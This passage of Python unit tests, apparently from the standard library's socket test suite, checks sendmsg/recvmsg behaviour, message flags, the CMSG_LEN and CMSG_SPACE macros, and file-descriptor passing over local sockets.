# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except TimeoutError:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("TimeoutError not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(TimeoutError,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
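    # For orientation (a hedged summary of the invariants exercised below):
    #
    #   socket.CMSG_LEN(n)   == socket.CMSG_LEN(0) + n    # header plus data
    #   socket.CMSG_SPACE(n) >= socket.CMSG_LEN(n)        # adds alignment padding
    #
    # so an ancillary buffer sized with CMSG_SPACE(n) has room for one control
    # message carrying n bytes of data plus any trailing padding.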
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
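    # Hedged sketch of the ancillary data item used for FD passing throughout
    # this class:
    #
    #   (socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", fds))
    #
    # i.e. cmsg_data is a packed array of native C ints, one per descriptor,
    # which is why the receive-side helpers below slice it to a whole number
    # of fds.itemsize bytes before unpacking.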
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
